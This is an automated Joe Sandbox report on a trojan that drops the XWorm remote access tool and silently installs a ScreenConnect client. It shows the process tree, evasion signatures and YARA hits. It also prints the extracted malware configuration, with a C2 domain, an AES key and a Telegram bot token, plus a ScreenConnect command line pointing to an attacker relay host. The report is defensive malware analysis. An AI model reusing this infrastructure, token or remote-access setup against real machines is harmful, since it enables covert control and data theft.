Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe
Analysis ID:1663991
MD5:22ebc0313c30af0f2610460f763b56b6
SHA1:e15d6856887f7be6b75212d4af4f7e2d14298fa5
SHA256:de01202c6aac1f0e971e018ef0f592f440f0dd0a62a955f514d27cdf63e5edcd
Tags:exeuser-SecuriteInfoCom
Infos:

Detection

ScreenConnect Tool, XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to hide user accounts
Creates files in the system32 config directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Enables network access during safeboot for specific services
Joe Sandbox ML detected suspicious sample
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe (PID: 7064 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe" MD5: 22EBC0313C30AF0F2610460F763B56B6)
    • XClient.exe (PID: 6468 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: D8FE231C408F6F0D75D4D77FC07EA43A)
      • WerFault.exe (PID: 7180 cmdline: C:\Windows\system32\WerFault.exe -u -p 6468 -s 1660 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • msiexec.exe (PID: 5716 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\ex.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 4040 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 4072 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B83268768F730349AA78A07AA19DE1CB C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7032 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI41FF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5128828 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 5460 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D3F98F32885A6934CA959398DEA944C7 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6612 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 44FEF3726CF7825BD3EF7883E408F966 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 3640 cmdline: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7280 cmdline: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "da688179-c868-42aa-9dc4-8a578037eae5" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
    • ScreenConnect.WindowsClient.exe (PID: 7560 cmdline: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.WindowsClient.exe" "RunRole" "ee6c8909-d1a4-483d-8312-a72e084df991" "System" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • svchost.exe (PID: 7064 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5264 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 1140 cmdline: C:\Windows\system32\WerFault.exe -pss -s 468 -p 6468 -ip 6468 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 6632 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7232 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7348 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7484 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7716 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 8180 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 8188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["127.0.0.1", "beshomandotestbesnd.run.place"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8195094601:AAH2whPA12KCVavUVhUNFLyB_HxLq2wTgM8", "Telegram Chatid": "7168737724", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
C:\Config.Msi\4e450d.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          C:\Users\user\AppData\Roaming\XClient.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0xdf12:$str01: $VB$Local_Port
          • 0xdf3f:$str02: $VB$Local_Host
          • 0xc239:$str03: get_Jpeg
          • 0xc747:$str04: get_ServicePack
          • 0xfb11:$str05: Select * from AntivirusProduct
          • 0x10349:$str06: PCRestart
          • 0x1035d:$str07: shutdown.exe /f /r /t 0
          • 0x1040f:$str08: StopReport
          • 0x103e5:$str09: StopDDos
          • 0x104db:$str10: sendPlugin
          • 0x1065b:$str12: -ExecutionPolicy Bypass -File "
          • 0x10ebf:$str13: Content-length: 5235
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x22f39:$s6: VirtualBox
                  • 0x37179:$s6: VirtualBox
                  • 0x22e97:$s8: Win32_ComputerSystem
                  • 0x370d7:$s8: Win32_ComputerSystem
                  • 0x25dce:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x3a00e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x25e6b:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x3a0ab:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x25f80:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x3a1c0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x247b2:$cnc4: POST / HTTP/1.1
                  • 0x389f2:$cnc4: POST / HTTP/1.1
                  Click to see the 12 entries
                  SourceRuleDescriptionAuthorStrings
                  0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                      0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                      • 0xc112:$str01: $VB$Local_Port
                      • 0xc13f:$str02: $VB$Local_Host
                      • 0xa439:$str03: get_Jpeg
                      • 0xa947:$str04: get_ServicePack
                      • 0xdd11:$str05: Select * from AntivirusProduct
                      • 0xe549:$str06: PCRestart
                      • 0xe55d:$str07: shutdown.exe /f /r /t 0
                      • 0xe60f:$str08: StopReport
                      • 0xe5e5:$str09: StopDDos
                      • 0xe6db:$str10: sendPlugin
                      • 0xe85b:$str12: -ExecutionPolicy Bypass -File "
                      • 0xf0bf:$str13: Content-length: 5235
                      0.2.SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exe.38349d8.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xd761:$s6: VirtualBox
                      • 0xd6bf:$s8: Win32_ComputerSystem
                      • 0x105f6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x10693:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x107a8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xefda:$cnc4: POST / HTTP/1.1
                      16.2.ScreenConnect.WindowsClient.exe.31efa18.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 18 entries

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mail.cloudhelpdesk.cloud&p=8041&s=cb6ea22b-45f3-4c61-aa46-9cc50773bf5a&k=BgIAAACkAABSU0ExAAgAAAEAAQDdnHauHg9AaqneAd41l5C3tLCoGT7WUxJecmODN7O3GDl7BK4OnznyrIEVt6ejqJMy0i72fOUbua3Sro67lzXQSv7JFpGDGjNGLtH6df16cg3uQgIklYYL5A5i9K7p1tIb2s0RhiLUXpx2WtkQ8UI0x1ArjnFKgdtb3Cz5m3g7VQKiw1q%2f3qX4c1o5ag%2ffIId2sXvAAShYtBQd%2fxIikb9i8RFtwmlUlraBV5wEj55Xklm%2ftTdu5vYTJVWaPN9vNHfqooUbjj6q7DLjfJLpyKLjOUdyv6nlReN8sdhapR%2fbzVm1m086KSyD3TXkWAHjGA%2fsttqVUVVjalUa63JAH6j4&c=XOWRM&c=XOWRM&c=XOWRM&c=XOWRM&c=&c=&c=&c=", ProcessId: 3640, ProcessName: ScreenConnect.ClientService.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (37ec872757ed9eb0) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 4040, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-28A0-8D1AD2BB7546}\(Default)
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7064, ProcessName: svchost.exe
                        No Suricata rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeAvira: detected
                        Source: https://login.liveAvira URL Cloud: Label: malware
                        Source: beshomandotestbesnd.run.placeAvira URL Cloud: Label: phishing
                        Source: C:\Users\user\AppData\Roaming\XClient.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: 00000002.00000002.1335713833.0000000002C8C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["127.0.0.1", "beshomandotestbesnd.run.place"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "8195094601:AAH2whPA12KCVavUVhUNFLyB_HxLq2wTgM8", "Telegram Chatid": "7168737724", "Version": "XWorm V5.6"}
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeReversingLabs: Detection: 63%
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeVirustotal: Detection: 59%Perma Link
                        Source: Submited SampleNeural Call Log Analysis: 90.1%
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: 127.0.0.1,beshomandotestbesnd.run.place
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: 7000
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: %LocalAppData%
                        Source: 00000000.00000002.1247068588.0000000003821000.00000004.00000800.00020000.00000000.sdmpString decryptor: cmd.exe
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_03FC0F08 CryptProtectData,9_2_03FC0F08
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_03FC16F1 CryptProtectData,9_2_03FC16F1
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_05AC007C CryptUnprotectData,9_2_05AC007C
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_05AC0D40 CryptUnprotectData,9_2_05AC0D40
                        Source: C:\Program Files (x86)\ScreenConnect Client (37ec872757ed9eb0)\ScreenConnect.ClientService.exeCode function: 9_2_05AC0072 CryptUnprotectData,9_2_05AC0072
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: SecuriteInfo.com.Trojan.MulDrop23.44572.16409.10206.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.4.dr
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.6.dr
                        Source: Binary string: System.Configuration.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.4.dr
                        Source: Binary string: System.Core.pdb@ source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.6.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Configuration.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.4.dr
                        Source: Binary string: System.Xml.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: mscorlib.pdb( source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1345857367.000000001B472000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.6.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Core.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000010.00000002.2476011004.0000000003171000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1345183979.000000001B092000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1340922647.0000000002761000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1340770610.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.4.dr
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000009.00000000.1274135005.000000000072D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.4.dr
                        Source: Binary string: mscorlib.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000006.00000003.1253348099.0000000004A40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1251273476.0000000004BBE000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.6.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll.6.dr, ScreenConnect.Windows.dll.4.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.6.dr
                        Source: Binary string: System.Management.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.6.dr
                        Source: Binary string: System.Management.ni.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: System.Core.pdb source: WER4F0E.tmp.dmp.14.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.6.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: MSI49E0.tmp.4.dr, 4e450e.msi.4.dr, 4e450d.rbs.4.dr, MSI473E.tmp.4.dr, MSI475F.tmp.4.dr, 4e450c.msi.4.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: rundll32.exe, 00000006.00000003.1251273476.0000000004B4F000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1347089184.000000001B6B2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll.6.dr, ScreenConnect.Windows.dll.4.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.2484149484.0000000002957000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.1344119133.0000000012770000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.4.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000010.00000000.1290146528.0000000000D72000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.WindowsClient.exe.4.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000013.00000002.1345010311.000000001B032000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.4.dr
